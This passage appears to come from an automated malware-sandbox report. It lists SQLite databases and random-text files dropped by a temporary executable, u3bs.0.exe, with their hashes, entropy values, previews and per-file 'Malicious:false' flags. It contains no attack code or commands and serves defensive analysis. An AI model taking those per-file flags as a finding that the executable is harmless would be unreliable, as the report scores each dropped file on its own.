                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):49152
                                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                      Entropy (8bit):0.037963276276857943
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                      MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                      SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                      SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                      SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):106496
                                                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.694985340190863
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                      MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                      SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                      SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                      SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.694985340190863
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                      MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                      SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                      SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                      SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.690299109915258
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                                                                                                                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                                                                                                                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                                                                                                                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                                                                                                                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.690299109915258
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                                                                                                                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                                                                                                                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                                                                                                                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                                                                                                                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):114688
                                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):28672
                                                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.692693183518806
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                      MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                      SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                      SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                      SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):98304
                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.699548026888946
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                      MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                      SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                      SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                      SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.699548026888946
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                      MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                      SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                      SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                      SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.694982189683734
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                      MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                      SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                      SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                      SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                      Malicious:false
